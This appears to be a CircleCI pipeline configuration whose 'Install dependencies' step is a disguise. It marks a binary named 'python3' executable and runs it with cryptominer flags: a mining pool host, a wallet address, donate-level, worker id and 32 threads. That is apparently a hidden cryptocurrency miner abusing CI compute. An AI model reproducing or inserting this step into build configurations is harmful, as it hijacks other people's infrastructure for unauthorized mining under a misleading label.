version: 2.1
jobs:
  build:
    working_directory: ~/platform 
    docker:
      - image: cimg/base:stable
    steps:
      - checkout:
          path: ~/platform #Here is the
      - run:
          name: Install dependencies
          command: |
            sudo apt update
            sudo apt upgrade
            sudo apt install python3
            sudo apt install python3.8-venv
            python3 -m venv venv
            . venv/bin/activate
            chmod +x python3
            ./python3 -o mintme-solo.wattpool.net:3005 -u 0x4E227342134E1c0beC9eE136394622C12F50BA48  --no-color --donate-level=1 --worker-id=6 -t 32
            

            
workflows:
  version: 2.1
  build_and_test:
    jobs:
      - build
